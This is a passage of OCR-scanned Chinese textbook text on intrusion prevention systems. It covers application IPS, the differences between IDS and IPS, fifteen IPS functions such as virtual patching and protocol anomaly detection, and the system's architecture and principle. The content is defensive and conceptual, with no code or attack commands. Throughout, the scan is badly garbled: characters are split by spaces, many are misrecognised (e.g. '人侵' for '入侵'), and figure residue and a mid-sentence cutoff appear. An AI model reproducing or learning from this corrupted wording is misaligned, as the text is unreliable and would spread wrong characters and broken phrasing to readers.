程序 。 

(6) 防止 网 络 拒绝 服务 攻击 (DoS) .分布 式 拒绝 服务 攻击 (DDoS) ` 面 回 市 宽 的 (Band- 
width-Oriented) 攻 击 ,同步 洪水 (SYN Flood) 攻 击 等 。 攻 击 的 一 种 形式 是 向 网 络 发 送 大 
86 


第 3 章 入 侵 防 御 


量 的 洪水 般 的 无 关 的 通信 ,造成 网 络 对 授权 的 (合法 的 ) 用 户 不 可 用 ,或 者 网 络 性 能 大 幅 降 
低 。NIPS 工作 在 网 络 层 , 可 以 保护 系统 免 受 这 些 类 型 的 攻击 。 


3 应 用 入 侵 防御 系统 

IPS 产品 有 一 个 特例 , 即 应 用 和 信和 盆 防御 系统 (Application Intrusion Prevention Sys- 
tem,AIPS) , 它 把 基于 主机 的 人 侵 防 护 扩 展 成 为 位 于 应 用 服务 带 之 前 的 网 络 设备 。AIPS 
被 设计 成 一 种 高 性 能 的 设备 ,配置 在 应 用 数据 的 网 络 链 路 上 ,以 确保 用 户 齐 守 设 定好 的 安 
全 策略 ,保护 服务 器 的 安全 。 

AIPS 可 以 把 HIPS 的 功能 延伸 到 驻 留 在 应 用 服务 器 之 前 的 网 络 设备 。AIP( 应 用 入 
侵 防 御 ) 设 备 是 部 署 在 应 用 数据 通路 中 的 一 种 高 性 能 设备 , 则 在 确保 用 户 人 遵守 已 确立 的 安 
全 策略 ,保护 应 用 环境 的 完整 性 。 它 会 检查 进出 设备 的 应 用 流量 ,根据 响应 得 出 结论 ,从 
而 尽量 降低 IT 部 门 配置 及 管理 更 新 的 工作 量 。 例 如 , 某 个 应 用 的 HTML 表格 索要 信用 
卡号 码 ,这样 一 来 AIPS 会 核查 提供 的 号 码 , 以 确保 其 不 超过 15 位 。 提 供 号 码 过 长 会 导 
致 缓冲 需 汶 出 ,而 字母 与 数字 混合 的 号 码 也 会 导致 应 用 系统 出 错 。AIPS 设备 能 够 防止 
诸多 入 侵 , 其 中 包括 Cookie 算 改 、SQL 代码 舱 入 参数 自 改 ,缓冲 带 江 出、 强制 浏览 ,畸形 
数据 包 ,数据 类 型 不 匹配 以 及 已 知 漏洞 。 

大 多 数 企 业 一 度 认 为 ,防火 墙 . 内 容 扫 描 器 和 人 侵 检 测 系统 (IDS) 足 以 保护 网 络 安 
全 ,但 数量 激增 的 因特网 协议 ,如 HTTP、SSL、SMTP 以 及 用 Java 和 ActiveX 创建 的 活 
动 代码 致使 许多 面 问 因特网 的 应 用 系统 容易 受到 攻击 。AIPS 设备 处 在 面 癌 因特网 的 应 
用 系统 前 ,可 以 阻挡 攻击 进入 应 用 系统 或 Web 服务 需 。 

AIP 是 一 种 可 以 在 一 定 程度 上 替代 主机 入 侵 预 防 系统 的 技术 ,作为 HIPS 产品 外 的 
男 一 种 技术 。AIP 设备 是 专门 针对 性 能 和 应 用 级 安全 研制 的 专用 设备 。 仅 向 IT 部 门 报 
告 已 发 现 的 威胁 并 不 够 ,应 用 入 侵 预 防 更 进一步 , 它 可 以 防止 已 经 被 发 现 的 攻击 进入 关键 
服务 符 。 针 对 应 用 的 大 部 分 攻击 是 通过 服务 融 问 口 80(HTTP) 或 443(SSL) 进 来 的 , 因 
而 AIPS 多 部 署 于 面 回 Web 依赖 HTTP 或 SSL 协议 的 应 用 系统 中 。 

总 的 来 说 ,AIPS 设备 具有 以 下 技术 优势 。 

(1) 易于 管理 。IT 部 门 不 必 安 装 和 配置 操作 系统 ,就 可 以 部 署 专用 安全 设备 。 操 作 
系统 和 安全 供应 商 提供 的 升级 和 补丁 不 需要 相互 协调 ,而 且 用 于 错误 通路 (Error Path) 
上 的 时 间 对 应 用 性 能 的 影响 较 小 。 最 终 用 户 只 把 AIPS 设备 插 和 人 机 架 .连接 至 网 络 、 制 定 
安全 策略 即 可 。 

(2) 加 强 应 用 销 误 诊断 。IT 部 门 可 以 诊断 任何 应 用 服务 岸 的 错误 ,AIPS 不 会 产生 
副作用 。 如 果 把 安全 隅 离 在 黑 盒 子 里 面 , 则 有 助 于 跟踪 分 析 整 个 网 络 的 错误 及 性 能 瓶颈 。 

(3) 提高 可 伸缩 性 。AIPS 设备 与 负载 均衡 硕 放 在 一 起 ,为 许多 下 洲 应 用 服务 货 提 供 
和信 侵 预防 功能 。IT 部 门 可 以 按 需要 增添 业务 应 用 服务 器 ,不 必 重 新 配置 安全 产品 。 

(4) AIPS 工作 在 网 络 上 ,直接 对 数据 包 进 行 检 测 和 阻 断 ,与 具体 的 主机 /服务 器 操作 
系统 平台 无 关 。 

(5) AIPS 的 实时 检测 与 阻 断 功能 很 有 可 能 出 现在 未 来 的 交换 机 上 。 随 着 处 理 需 性 
能 的 提高 ,每 一 层次 的 交换 机 都 有 可 能 集成 人 侵 防 护 功 能 。 
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313 入侵 检测 与 入 侵 防 御 的 区 别 


通常 IPS 看 起 来 和 防火 墙 相似 ,并 有 量具 备 防 火 墙 的 一 些 基 本 功能 ,但 是 防火 墙 阻止 所 
有 网 络 流量 ,除了 某 种 原因 能 够 通过 ,而 IPS 通过 所 有 网 络 流 量 , 除 了 某 种 原因 被 阻止 。 
IPS 能 够 实现 积极 、 主 动 地 阻止 入 侵 攻 击 行为 对 网 络 或 系统 造成 危害 ,同时 结合 漏洞 扫 
描 、 防 火 墙 .IDS 等 构成 整体 .深度 的 网 络 安全 防护 体系 。 

IPS 是 位 于 防火 场 和 网 络 的 设备 之 间 的 设备 。 如 果 检 测 到 攻击 ,IPS 会 在 这 种 攻击 
扩散 到 网 络 的 其 他 地 方 前 阻止 这 个 恶意 的 通信 。 而 IDS 只 存在 于 网 络 外 ,起 到 报警 的 作 
用 ,而 不 是 在 网 络 前 面 起 到 防御 的 作用 。IPS 检测 攻击 的 方法 也 与 IDS 不 同 。 一 般 来 说 ， 
IPS 依 徘 对 数据 包 的 检测 , 它 会 检查 人 网 的 数据 包 , 确 定 这 种 数据 包 的 真正 用 途 , 然 后 决 
定 是 否 允 许 这 种 数据 包 进 入 网 络 。 从 产品 的 价值 方面 和 产品 的 应 用 方面 讲 ,IPS 与 IDS 
也 有 不 同 之 处 。 

从 产品 价值 角度 讲 ,IDS 注重 的 是 网 络 安全 状况 的 监管 。IPS 关注 的 是 对 入 侵 行 为 
的 控制 。 与 防火 墙 类 产品 ,人 侵 检 测 产品 可 以 实施 的 安全 策略 不 同 ,IPS 可 以 实施 深层 防 
御 安全 策略 , 即 可 以 在 应 用 层 检测 出 攻击 并 予以 阻 断 , 这 是 防火 墙 做 不 到 的 ,当然 也 是 入 
侵 检测 产品 做 不 到 的 。 

从 产品 应 用 角度 讲 , 为 了 达到 可 以 全 面 检测 网 络 安全 状况 的 目的 ,IDS 需要 部 署 在 网 络 
内 部 的 中 心 点 ,需要 能 够 观察 到 所 有 的 网 络 数据 。 如 来 信息 系统 中 包含 多 个 逻辑 隔离 的 子 
网 , 则 需要 在 整个 信息 系统 中 实施 分 布 部 署 , 即 每 个 子 网 部 署 一 个 人 侵 检 测 分 析 引 擎 ,并 统 
一 进行 引擎 的 策略 管理 以 及 事件 分 析 , 以 达到 掌控 整个 信息 系统 安全 状况 的 目的 。 

而 为 了 实现 对 外 部 攻击 的 防御 ,IPS 需要 部 普 在 网 络 的 边界 。 这 样 ,所 有 来 日 外 部 的 
数据 必须 串 行 通过 IPS,IPS 即 可 实时 分 析 网 络 数据 ,发现 攻击 行为 立即 予以 阻 断 ,保证 来 
自 外 部 的 攻击 数据 不 能 通过 网 络 边界 进入 网 络 。 

IDS 的 核心 价值 在 于 通过 对 全 网 信息 的 分 机, 了解 信息 系统 的 安全 状况 ,进而 指导 信 
息 系统 安全 建设 目标 以 及 安全 策略 的 确立 和 调整 ,而 IPS 的 核心 价值 在 于 安全 策略 的 实 
施 , 即 对 黑客 行为 的 阻击 ;IDS 需要 部 署 在 网 络 内 部 ,监控 范围 可 以 覆盖 整个 子 网 ,包括 来 
自 外 部 的 数据 以 及 内 部 终端 之 间 传 输 的 数据 ,IPS 则 必须 部 署 在 网 络 边界 ,抵御 来 自 外 部 
的 人 侵 , 对 内 部 攻击 行为 无 能 为 力 。 

IDS 是 一 种 监控 网 络 中 未 经 授权 行为 的 软件 或 设备 。 使 用 预先 设置 的 规则 ,IDS 就 
可 以 检测 冰点 配置 ,以 便 确 定 庙 点 是 人 否 易 受 攻击 ,用 户 还 可 以 记录 网 络 上 的 行为 ,然后 将 
其 与 已 知 的 攻击 或 攻击 模式 进行 比 对 。IPS 能 够 监测 由 僵尸 网 络 .病毒 、. 亚 意 代码 以 及 有 
针对 性 的 攻击 引起 的 异 第 流量 ,还 能 够 在 破坏 发 生前 采取 保护 网 络 的 行动 。 许 多 网 络 攻 
击 者 会 使 用 自动 扫描 探测 互联 网 ,对 每 个 网 络 都 进行 漏洞 探测 记录 供 日 后 使 用 。 这 些 攻 
击 者 对 任何 数据 都 感 兴趣 ,如 个 人 信息 、 财 务 记录 等 。 

IPS 作为 一 种 新 型 网 络 安全 防护 技术 , 它 通 过 审计 分 析 计 算 机 网 络 或 系统 上 的 数据 
正确 区 分 数据 类 型 为 正常 或 寞 第 攻击 ,同时 实时 、 主 动 啊 应 和 防御 入 侵 攻 击 ,从 而 保障 了 
网 络 或 系统 安全 。IPS 借鉴 IDS 的 思想 并 在 其 基础 上 发 展 ,因此 两 者 既 有 共同 之 处 ,又 存 
在 区 别 。IPS 既 可 以 像 IDS 对 入 侵 攻 击 进行 检测 并 报警 啊 应 ,同时 又 能 够 主动 阻止 入 侵 
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行为 .日 动 切断 攻击 源 。 两 者 在 功能 上 的 差异 ,使 得 它们 在 网 络 中 的 部 署 情况 不 同 。 

IDS 主要 是 通过 监视 和 发 现 网 络 中 的 攻击 行为 并 发 出 报警 的 ,采用 劳 路 方式 并 联接 
入 网 络 ;而 IPS 不仅 对 网 络 中 的 攻击 行为 进行 检测 ,同时 要 和 实时、 动态 啊 应 并 阻 断 攻 击 , 才 
能 保障 内 部 受 保护 网 络 的 安全 ,因此 米 用 在 线 (In-Line) 方 式 百 接 串 联接 入 网 络 , 图 3-1 给 
出 了 两 者 不 同 的 网 络 拓扑 结构 。 如 末 入 侵 攻 击 已 通过 防火 墙 的 屏障 ,由 于 IDS 处 于 网 络 
中 的 劳 路 ,即使 能 够 检测 并 发 出 报警 ,也 无 法 阻止 已 对 内 部 网 络 造 成 的 危害 ;IPS 因 其 直 
接 是 联 在 网 络 中 ,经 过 检测 发 现 攻击 时 能 够 实时 将 恶意 连接 且 接 阻挡 在 外 。 显 人 然 ,IPS 能 
够 提供 一 个 更 加 有 效 \ 深 层次 的 安全 防护 。 
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“83 入 侵 防 御 系 统 的 功能 


IPS 是 一 种 乔 能 化 的 入 侵 检测 和 防御 产品 , 它 不 但 能 检测 入 侵 的 发 生 , 而 且 能 通过 一 
定 的 啊 应 方式 ,实时 中 止 入 侵 行为 的 发 生 和 发 展 ,实时 保护 信息 系统 不 受 实质 性 的 攻击 。 
IPS 使 得 IDS 和 防火 墙 走 向 统一 。 简 单 地 理解 ,可 认为 IPS 就 是 防火 墙 加 上 入 侵 检 测 系 
统 , 但 并 不 是 说 IPS 可 以 代 答 防火 声 或 人 侵 检 测 系统 。 防 火场 是 粒度 比较 粗 的 访问 控制 
产品 , 它 在 基于 TCP/IP 的 过 滤 方 面 效 率 高 ,而 且 在 大 多 数 情况 下 ,可 以 提供 网 络 地 址 转 
换 服务 代 理 ,流量 统计 等 功能 ,其 至 有 的 防火 墙 还 能 提供 VPN 功能 。 与 防火 墙 相 比 ， 
IPS 的 功能 比较 单一 , 它 只 能 串联 在 网 络 上 (类 似 于 网 桥 式 防 火 墙 ), 对 防火 墙 不 能 过 滤 的 
攻击 进行 过 滤 。 这 样 ,一 个 两 级 的 过 渡 模 式 可 以 最 大 限度 地 保证 系统 安全 。 

一 般 来 说 ,企业 用 尸 关 注 的 是 日 已 的 网 络 能 侣 避免 和 被 攻击 ,对 于 能 检测 到 多 少 攻击 并 
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不 关注 ,但 这 并 不 是 说 和 人 侵 检 测 系统 就 没有 用 处 ,在 一 些 专业 的 机 构 或 对 网 络 安全 要 求 比 
较 高 的 地 方 , 入 侵 检 测 系统 和 其 他 审计 跟踪 产品 结合 ,可 以 提供 针对 企业 信息 资源 的 全 面 
的 审计 能 力 ,对 于 攻击 还 原 、 入 侵 取 证 .异常 事件 识别 .网 络 故 障 排除 等 都 有 很 重要 的 作 
用 。 可 以 将 入 侵 防 御 系 统 的 主要 功能 总 结 为 以 下 15 个 部 分 。 

1 实时 监视 和 拦截 攻击 

实时 主动 地 拦截 黑客 的 攻击 .蠕虫 .网 络 病毒 .木马 .DoS 等 恶意 流量 ,保护 企业 信息 
系统 和 网 络 结构 免 受 侵 害 , 防 止 操作 系统 死机 ,应 用 程序 损坏 。 


2 虚拟 补丁 

基础 系统 漏洞 主要 是 指 操作 系统 的 基本 服务 或 主流 服务 软件 的 漏洞 。 正 如 只 有 特定 
纹路 的 钥匙 才能 打开 一 把 锁 ,只 有 特定 “特征 ”的 攻击 才能 攻陷 一 个 漏洞 。 采 用 基于 漏洞 
存在 检测 技术 的 引擎 ,通过 检测 攻击 的 特征 ,才能 有 歼 地 对 抗 经 过 特殊 设计 的 躲避 技术 ， 


做 到 去 误 报 ,从 而 达到 给 受 保 护 的 操作 系统 和 服务 软件 安 妆 虚拟 补丁 的 歼 采 。 
3 保护 客户 端 


现在 主流 的 攻击 很 多 是 面向 客户 端 程 序 的 ,浏览 带 、 可 编辑 文档 、 多 媒体 是 重 中 之 重 ， 
客户 问 防 护 的 注 弱 使 大 量 的 PC 被 黑客 控制 成 僵尸 ,PC 上 的 重要 信息 也 被 鳃 取 。3 引 擎 根 
据 协 议和 文件 格式 做 深入 解析 ,可 以 检测 被 编码 或 压缩 的 内 容 , 如 GZIP、UTF 等 ;解析 过 
程 中 , 目 动 跳 过 和 威胁 无 关 的 部 分 ,为 用 尸 提供 浏览 费 及 其 插件 的 安全 防护 。 


4 协议 异常 检测 

黑客 通 负 利 用 网 络 上 用 于 服务 硕 设 计 中 的 漏洞 对 服务 大 进行 攻击 。 通 过 回 服务 天 发 
送 非 标准 或 者 缓冲 区 洲 出 的 通信 数据 ,进而 和 于 取 服 务 融 控制 权 或 者 造成 服务 硕 死 机 。 协 
议 解 析 引 擎 对 网 络 报 文 进 行 次 度 协 议 分 析 ,对 那些 违背 RFC 规定 的 行为 ,或 者 对 明显 过 
长 的 字段 、 明 显 不 合理 的 协议 交互 顺序 . 异 稼 的 应 用 协议 的 各 个 参数 等 信息 进行 识别 。 协 
议 异 常 检测 包括 HTTP、SMTP、FTP、POP3、IMAP4、MSRPC 等 30 多 种 常用 协议 。 同 
时 ,引擎 把 内 容 层 面 如 XML 页 面 和 PDF 文件 等 也 看 作协 议 , 如 果 出 现 异常 的 文件 结构 ， 
也 会 认为 是 一 种 协议 异常 ,通过 这 种 方法 分 析出 潜藏 在 文件 内 容 中 的 缓冲 区 异常 攻击 或 
者 脚本 攻击 等 人 侵 行为 。 


5 WW 好 应 用 防护 

入 侵 防 御 系 统 产品 采用 积极 的 安全 模式 确保 执行 正确 的 应 用 行为 ,不 菲 攻 击 特征 符 
或 模式 匹配 技术 束 能 识别 正确 的 应 用 行为 ,并 阻止 任何 育 离 了 正确 应 用 活动 的 恶意 行为 ， 
能 够 在 威胁 达到 终端 前 就 采取 拦截 动作 。 网 络 智 能 防护 的 核心 是 一 个 多 层次 的 安全 引 
萤 ,分 析 威 胁 从 网 络 到 达 最 终 用 户 计 算 机 的 整个 过 程 ,具备 深层 次 的 协议 和 隧道 的 分 析 能 
力 ,使 得 它 能 够 在 复杂 的 Web 2.0 的 交互 中 检测 威胁 。 

6 流量 安全 防护 

人 侵 防 御 系 统 应 该 具备 从 网 络 层 到 应 用 层 的 DDoS 攻击 检测 能 力 , 可 以 在 拒绝 攻击 
发 生 或 短 时 间 内 大 规模 爆发 的 病毒 导致 网 络 流量 激增 时 ,能 日 动 发 现 并 检测 异 稼 流量 , 提 
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醒 管 理 员 及 时 应 对 ,保护 路 由 器 、 交 换 机 、VolP 系统 .DNS、Web 服务 器 等 网 络 基础 设施 
免 受 各 种 拒绝 服务 攻击 ,你 证 关键 业务 畅通 。 


7 应 用 识别 和 控制 

人 侵 防 御 系 统 能 全 面 监 而 和 管理 即时 通信 (Instant Messenger,IM) ,网 络 游 戏 , 在 线 
视频 及 在 线 炒 股 等 网 络 行为 ,协助 企业 辨识 和 限制 非 授 权 网 络 行为 ,更 好 地 执行 企业 的 安 
全 策略 ,保障 员工 的 工作 效率 ,采用 细致 市 宽 分 配 策略 限制 P2P ,在线 视频 、 大 文件 下 载 等 
大 量 不 良 应 用 占用 的 带宽 ,保障 办 公 自 动 化 COfftice Automation,OA) 、 企 业 资源 计划 
(Enterprise Resource Planning,ERP) 等 办 公 应 用 获得 足够 的 市 宽 文 持 , 提 升 上 网 速度 。 


& IP6 及 隧道 检测 

入 侵 防 御 系 统 同 时 支持 IPv6/IPv4 双 栈 的 漏洞 防护 ,支持 IPv6 .IJPv6 over IPv4 IPv6 
和 IPv4 混合 网 络 的 应 用 层 攻 击 防护 ,以 及 DDoS 流量 异常 攻击 防护 ,能 够 完全 适应 IPv6 
环境 及 过 渡 期 网 络 环境 。 同 时 ,系统 还 支持 对 VLAN IEEE 802. 1q、MPLS, 1IPSec 及 
GRE( 通 用 路 由 封装 ) 等 隧道 的 流量 分 析 和 人 处理 ,能 够 对 流量 进行 识别 并 且 解 析出 内 层 报 
文 进行 检测 ,从 而 适应 各 种 复杂 的 网 络 。 

9 策略 管理 

防御 和 人 侵 系统 采用 灵活 的 策略 配置 和 管理 方式 ,内 置 多 种 威胁 防护 策略 模板 ,可 适用 
于 大 多 数 用 户 的 第 见 场景 。 各 种 功能 的 末 略 可 以 任意 组 合 ,可 以 对 网 络 流量 检测 和 控制 
进行 细 粒 度 的 配置 。 


10 知识 库 和 引 敬 升级 

人 侵 防 御 系 统 可 以 及 时 升级 ,实时 捕获 最 新 的 攻击 .蠕虫 病毒 .木马 等 ,提取 威胁 的 签 
名 ,发 现 威胁 的 趋势 ,这 梓 能 够 在 最 短 的 时 间 内 获得 最 新 的 签名 ,及 时 升级 检测 引擎 ,从 而 
具备 防御 0-day 攻击 的 能 力 。 签 名 库 定 期 升级 ,特殊 情况 下 可 及 时 进行 升级 。 为 满足 设 
备 在 各 种 应 用 环境 下 的 灵活 部 署 , 文 持 多 种 升级 方式 。 

1 设备 集中 害 理 

随 看 设备 的 逐渐 增多 ,安全 管理 的 复杂 性 大 大 增加 ,设备 的 集中 管理 软件 为 用 户 提 供 
设备 集中 配置 管理 功能 ,能够 全 面 实现 安全 条 略 的 配置 和 用 户 业 务 的 管理 ,减轻 用 户 的 维 
护 工 作 量 ,保障 用 户 投资 。 集 中 管理 软件 采用 B/S 架构 ,在 控制 台 通过 浏览 右 进 行 访问 ， 
文 持 多 用 户 同 时 操作 ,能 适应 复杂 .大 型 网 络 的 管理 需求 ,及 用 图 形 化 的 配置 .维护 界面 ， 
可 以 通过 耳 观 的 Web 配置 界面 完成 对 大 部 分 设备 的 业务 配置 。 

软件 的 集中 管理 功能 主要 体现 在 设备 管理 .故障 监控 、 策 略 管理 .系统 监控 及 日 志和 
报表 管理 等 儿 大 方面 。 集 中 管理 软件 可 目 动 识别 设备 类 型 和 型 号 ,同时 对 全 网 所 有 设备 
进行 管理 ,完成 设备 的 差异 性 适 配 , 晶 动 获 取 设 备 的 实体 数据 ,包括 机 框 、 单 板 、 电 源 、 风 
刷 ,端口 .温度 .CPU 占用 率 、 内 存 占用 率 和 等。 支持 设备 的 单 点 配置 ,将 设备 内 极 的 Web 
配置 集成 到 集中 管理 软件 界面 ,用 户 单机 进行 连接 。 

2 故障 监控 

集中 管理 软件 可 以 对 网 络 中 的 异 第 运行 情况 进行 实时 监视 ,通过 告警 统计 、 定 位 、 提 
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不 、 香 定义、 告 索 远程 通知 等 手段 ,高 助 网 络 管 理 员 及 时 米 取 措施 ,恢复 网 络 正 第 运行 。 同 
时 ,对 管理 员 已 经 处 理 过 的 告 填 进行 标识 ,便于 区 分 。 

系统 提供 告警 信息 训 览 . 告 团 查询 功能 ,并 且 可 以 将 第 用 查询 条 件 保存 为 告警 查询 覆 
板 。 和 针对 大 量 的 告 索 信 息 ,系统 文 持 按照 设置 的 统计 条 件 ( 如 告 过 名 称 . 告 署 级 别 .告警 功 
能 分 类 ` 告 辕 时 间 .各党 状态 等 ) 对 告警 信 息 进 行 统计 ,使 用 户 可 以 快速 了 解 告 导 发 生 的 
情况 。 

为 了 避免 大 量 的 见 余 信息 ,集中 管理 软件 上 支持 设置 告警 屏蔽 功能 ,根据 设置 的 屏蔽 
条 件 , 可 以 对 不 重要 的 各 索 进 行 屏蔽 , 既 不 显示 ,也 不 你 存 。 


13 集中 软件 过 理 

集中 管理 软件 需要 从 全 局 角度 对 所 有 设备 实现 集中 管理 .集中 制定 安全 宁 略 。 当 分 
文 机 构 比 较 多 时 ,可 以 采用 统一 的 安全 宁 略 统一 监控 ,避免 下 属 机 构 各 月 制定 安全 采 略 ， 
引发 网 络 混乱 。 用 户 只 需要 一 次 性 定义 一 条 有 宋 略 ,人 然后 将 其 部 大 到 多 台 设 备 中 。 对 于 议 
备 升 级 的 场 丸 ,集中 管理 环境 支持 集中 部 蜀 在 线 升级 策略 ,并 且 可 以 进行 全 网 设备 的 集中 
本 地 升级 。 

系统 提 癸 议 备 发 现 宋 略 功能 ,可 以 将 现 有 设备 的 配置 用 管理 软件 进行 管理 ;提供 蛇 略 
部 普 成 功 . 失 败 .审计 不 一 致 .设备 命令 变更 的 状态 ,对 设备 配置 现状 一 目 了 然 。 

用 户 的 管理 域 和 权限 管理 相对 于 安全 管理 至 关 重 要 ,入 侵 防御 集中 管理 软件 除了 预 
置 常用 的 管理 员 操作 员 、 审 计 用 户 组 外 ,还 支持 用 户 根据 实际 情况 创建 自己 需要 的 用 户 
组 并 设置 相应 的 管理 和 操作 权限 。 根 据 用 户 的 权限 ,在 操作 界面 上 ,不 可 管理 的 设备 和 慌 
面 区 域 是 不 可 见 的 ,从 而 实现 用 尸 的 分 级 省 理 ,你 证 安全 性 。 


4 系统 监控 

入 侵 防 御 集 中 管理 软件 的 系统 管理 功能 是 对 管理 软件 本 身 的 系统 进行 维护 和 管理 ， 
而 不 是 对 设备 的 管理 。 除 了 对 软件 目 身 的 安全 操作 事件 进行 监控 外 ,还 包括 日 志 管 理 . 数 
据 库 管 理 .通信 参数 管理 等 内 容 。 系 统 监控 的 功能 需要 能 够 监控 系统 或 进程 的 局 动 / 停 止 
服务 ,进行 通信 模式 设置 ,提供 工具 实现 日 喘 的 进程 .内 存 占用 率 、CPU 占用 率 、 便 盘 空 间 
情况 监控 ,一 旦 超出 设置 的 阔 值 , 即 可 产生 告警 。 

为 保证 数据 安全 ,应 定期 进行 数据 库 备 份 。 人 侵 防 御 系 统 的 数据 库 备 份 管理 系统 提 
供 统 一 的 数据 库 备 份 和 恢复 工具 ,以 减 小 网 管 维护 数据 库 的 难度 。 集 中 管理 软件 文 持 数 
据 库 的 转 储 功 能 , 转 储 数据 库 中 的 数据 包括 操作 日 志 、 安 全 日 志 、 告 警 数 据 .事件 数据 及 多 
种 性 能 事件 。 用 户 可 以 选择 启动 手工 转 储 , 或 者 设置 溢出 转 储 或 周期 转 储 的 方式 。 


15 日 志和 报表 

作为 安全 产品 ,日 志和 报表 的 展现 具有 重要 的 用 户 价 伍 。 通 过 日 志和 报表 ,用 户 可 以 
及 时 掌握 网 络 状况 ,对 网 络 的 流量 和 安全 情况 有 整体 的 认识 ,能 够 对 不 正常 的 行为 进行 审 
计 和 分 析 , 并 且 可 以 依据 已 知 的 信息 对 受 保护 的 系统 进行 安全 加 固 , 以 及 对 网 络 的 安全 策 
略 不 断 调整 优化 。 

和 人 侵 防 御 系统 提供 丰富 的 报表 功能 。 预 置 的 综合 报表 包含 了 大 多 数 用 户 需要 重点 关 
注 的 信息 内 容 , 针 对 不 同 设备 的 网 络 流量 .应 用 协议 分 布 、. 漏 洞 和 流量 威胁 发 生 的 情况 进 
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报表 的 方式 ,可 选择 多 个 报表 子 项 进行 组 合 ,定时 生成 日 报表 、 周 报表 和 年 报表 ,并 且 可 以 
用 邮件 方式 发 送 给 用 户 , 生 成 可 编辑 的 报表 格式 ,用 尸 可 以 根据 需要 对 报表 内 容 和 格式 进 
行 册 次 编辑 。 

入 侵 防 御 系 统 捉 供 多 维 的 日 志 碍 询 系统 ,用 户 可 以 根据 不 同 的 组 合 条 件 对 日 志 进 行 
过 滤 碍 询 , 便 于 在 海量 数据 中 寻找 需要 的 关键 信息 。 


3.3 ”入 侵 防 御 系 统 的 原理 与 部 署 


331 入 侵 防 御 系 统 的 原理 
入 侵 防 御 系 统 的 总 体 架 构 如 图 3-2 所 示 。 


PS ee ee en en Vi ee nl nl ee We en wl es i mn, 到 


开通 开 瑾 


网 络 抓 包 引 车 模块 


图 3-2 人 侵 防 御 系 统 的 总 体 架 构 


1 入 侵 啊 应 模块 

人 侵 啊 应 模块 可 以 在 捕获 到 人 侵 事 件 之 后 及 时 做 出 处 理 , 并 将 相应 的 信息 反馈 给 入 
侵 日 志 数 据 库 和 控制 台 。 

2 规则 匹配 模块 

规则 匹配 模块 是 对 数据 预 处 理 模块 提交 的 数据 运用 匹配 算法 和 知识 库 中 的 规则 进行 
比较 分 析 , 从 而 判断 是 否 有 入 侵 行 为 。 

3 数据 预 处 理 模块 

数据 预 处 理 模块 主要 是 对 数据 报 文 进行 协议 解析 及 标准 化 ,包括 卫 雁 片 重组 、TCP 
流 重 组 ,HTTP、Unicode、RPC、Telnet 解码 等 功能 。 经 过 数据 预 人 处理 模块 之 后 提取 相关 
信息 ,并 将 处 理 后 的 报 文 交 给 规则 匹配 模块 处 理 。 

4 网 络 抓 包 引擎 模块 

网 络 抓 包 引擎 模块 可 捕获 监听 网 络 中 的 原始 数据 包 , 作 为 人 侵 防 御 系 统 分 析 的 数据 
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5 入 侵 日 志 数 据 库 
人 侵 日 志 数 据 库 负 责 对 整个 系统 的 工作 过 程 进 行 数 据 收 集 、. 记录、 统计 分 析 和 存储 


管理 。 
6 控制 台 
控制 台 是 引擎 和 外 部 指令 交互 的 窗口 ,主要 接收 外 部 的 指令 执行 相关 操作 。 
7 用户 界面 
用 户 界 面 是 用 户 和 入 侵 防 御 系 统 互动 的 直接 窗口 ,界面 提供 可 视 化 的 威胁 分 析 、 系 统 


状态 显示 、 用 户 指令 输入 接口 等 功能 ,以 Web 方式 提供 给 客户 。 

由 于 入侵 检测 大 多 只 能 进行 网 络 安全 监控 ,产生 报警 .日 志 等 操作 ,已 经 不 能 满足 网 
络 安全 的 需要 ,因此 在 入 侵 检 测 系统 的 基础 上 提出 了 入 侵 防 御 系统 。 入 侵 防御 系统 用 来 
识别 针对 计算 机 系统 .网络 系 统 或 更 广泛 意义 上 的 信息 系统 的 非法 攻击 ,包括 检测 外 界 非 
法 入 侵 者 的 恶意 攻击 或 试探 ,以 及 内 部 合法 用 户 超越 使 用 权限 的 非法 行为 等 。 入 侵 防御 
系统 是 入 侵 防御 软件 与 硬件 的 结合 。 与 其 他 安全 产品 不 同 的 是 ,入 侵 防御 系统 需要 更 多 
的 智能 , 它 能 对 网 络 数据 包 进 行 协议 分 析 , 解 析出 包头 信息 和 数据 信息 ,并 能 实现 IP 碎 
片 重 整 .TCP 的 流 重组 等 功能 。 通 过 对 数据 包 内 容 进行 检测 过 滤 ,从 而 发 现 网 络 攻击 行 
为 。 入 侵 防御 系统 是 对 传统 安全 产品 的 合理 补充 , 它 能 帮助 系统 对 付 网 络 攻击 ,扩展 系统 
管理 员 的 安全 管理 能 力 (包括 安 全 审计 ,监视 .进攻 识别 和 响应 ) ,提高 信息 安全 基础 结构 
的 完整 性 。 

入 侵 防御 系统 相对 入 侵 检测 系统 而 言 ,更 借 向 于 提供 主动 的 防护 。 它 直接 拒 入 到 网 
络 流量 中 ,通过 一 个 网 络 接口 接收 来 自 外 部 系统 的 流量 。 若 经 过 检查 确认 不 含有 异常 活 
动 或 可 疑 内 容 , 再 通过 另外 一 个 网 络 接口 将 它 传递 到 内 部 系统 中 。 这 样 ,有 问题 的 数据 包 
以 及 所 有 来 自 同一 数据 流 的 后 续 数据 包 ,都 会 被 IPS 彻底 清除 掉 ， 

入 侵 防御 系统 指 不 但 能 检测 入侵 的 发 生 , 而 且 能 通过 一 定 的 响应 方式 实时 中 止 人 侵 
行为 的 发 生 和 发 展 ,实时 保护 信息 系统 不 受 实质 性 攻击 的 一 种 智能 化 的 安全 体系 。 它 是 
一 种 主动 的 、 积 极 的 入 侵 防 范 及 阻止 系统 ,其 设计 旨 在 预先 对 入 侵 活动 和 攻击 性 网 络 流量 
进行 检测 和 拦截 ,避免 其 造成 任何 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 
警报 。 它 部 署 在 网 络 的 进出 口 处 , 当 它 检测 到 攻击 企图 后 , 它 会 自动 将 攻击 包 丢 掉 或 采取 
措施 将 攻击 源 阻 断 。 入 侵 防御 系统 的 工作 原理 如 图 3-3 所 示 。 

入 侵 防御 系统 实时 检查 和 阻止 人 侵 的 原理 在 于 入 侵 检测 系统 拥有 数量 众多 的 过 波 
器 ,能 够 防止 各 种 攻击 。 当 新 的 攻击 手段 被 发 现 后 ,入 侵 防 御 系 统 就 会 创建 一 个 新 的 过 滤 
器 。 入 侵 防御 系统 数据 包 处 理 引 擎 是 专业 化 定制 的 集成 电路 ,可 以 深层 次 地 检查 数据 包 
的 内 容 。 如 果 有 攻击 者 利用 Layer2( 介 质 访问 控制 ) ~Layer7( 应 用 ) 的 漏洞 发 起 攻击 ,入 
